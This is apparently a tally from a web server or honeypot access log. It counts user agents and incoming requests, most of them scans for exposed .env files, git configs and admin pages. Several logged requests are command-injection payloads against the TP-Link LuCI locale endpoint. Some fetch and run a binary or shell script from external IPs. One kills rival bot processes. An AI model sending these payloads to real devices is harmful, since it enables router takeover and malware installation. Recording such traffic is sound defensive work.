1	`Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
2	`Mozilla/5.0 zgrab/0.x`
5	`Mozilla/5.0`
1	`WDG_Validator/1.6.2`
1	`curl/8.1.2`
30	`python-requests/2.27.1`
1	`python-requests/2.31.0`
1	`python-requests/2.32.3`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
1		`MGLNDD_13.67.44.234_80`
2		`\x03`
4		`\x16\x03\x01\x01\x07\x01`
1		`\x16\x03\x01\x01\x17\x01`
1		`\x16\x03\x01\x01\xfb\x01`
18		`\x16\x03\x01`
2	CONNECT	`example[.]com:443`	HTTP/1.1
2	CONNECT	`google[.]com:443`	HTTP/1.1
3	CONNECT	`one[.]one[.]one[.]one:80`	HTTP/1.1
1	GET	`/.env.example`	HTTP/1.1
1	GET	`/.env.local`	HTTP/1.1
1	GET	`/.env.production`	HTTP/1.1
1	GET	`/.env.sample`	HTTP/1.1
18	GET	`/.env`	HTTP/1.1
1	GET	`/.environment`	HTTP/1.1
2	GET	`/.git/config`	HTTP/1.1
1	GET	`/.vscode/sftp.json`	HTTP/1.1
1	GET	`/1.php`	HTTP/1.1
1	GET	`/?%3Cplay%3Ewithme%3C/%3E`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/API/.env`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/admin/.env`	HTTP/1.1
1	GET	`/administrator/.env`	HTTP/1.1
1	GET	`/api/.env`	HTTP/1.1
1	GET	`/app/.env`	HTTP/1.1
1	GET	`/apps/.env`	HTTP/1.1
1	GET	`/assets/.env`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=ec8&psd=ec8`	HTTP/1.0
1	GET	`/bundle.js`	HTTP/1.1
4	GET	`/cdn-cgi/trace`	HTTP/1.1
14	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45[.]148[.]10[.]78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60)`	HTTP/1.1
13	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60)`	HTTP/1.1
21	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103[.]149[.]28[.]141%2Ft+-O-+\|+sh%60)`	HTTP/1.1
1	GET	`/cgi-bin/phpinfo.php`	HTTP/1.1
1	GET	`/cgi-bin`	HTTP/1.1
1	GET	`/cluster/cluster/`	HTTP/1.1
1	GET	`/config.cjs`	HTTP/1.1
2	GET	`/config.js`	HTTP/1.1
1	GET	`/config.yaml`	HTTP/1.1
1	GET	`/config.yml`	HTTP/1.1
2	GET	`/config/.env`	HTTP/1.1
1	GET	`/config/mail.php`	HTTP/1.1
1	GET	`/core/.env`	HTTP/1.1
1	GET	`/cronlab/.env`	HTTP/1.1
1	GET	`/database/.env`	HTTP/1.1
1	GET	`/druid/index.html`	HTTP/1.1
1	GET	`/en/.env`	HTTP/1.1
4	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/files/`	HTTP/1.1
1	GET	`/form.html`	HTTP/1.1
1	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/laravel/.env`	HTTP/1.1
1	GET	`/lib/.env`	HTTP/1.1
1	GET	`/mail.php`	HTTP/1.1
1	GET	`/manager/text/list`	HTTP/1.1
1	GET	`/password.php`	HTTP/1.1
1	GET	`/public/.env`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/server/.env`	HTTP/1.1
1	GET	`/site/.env`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/sitemaps/.env`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.1
1	GET	`/tools/.env`	HTTP/1.1
1	GET	`/upl.php`	HTTP/1.1
1	GET	`/uploads/.env`	HTTP/1.1
1	GET	`/v1/.env`	HTTP/1.1
1	GET	`/vendor/.env`	HTTP/1.1
1	GET	`/web/.env`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`/wp-content/plugins/elementor/readme.txt`	HTTP/1.1
2	GET	`http[:]//example[.]com/`	HTTP/1.1
1	HEAD	`/`	HTTP/1.0
1	PRI	`*`	HTTP/2.0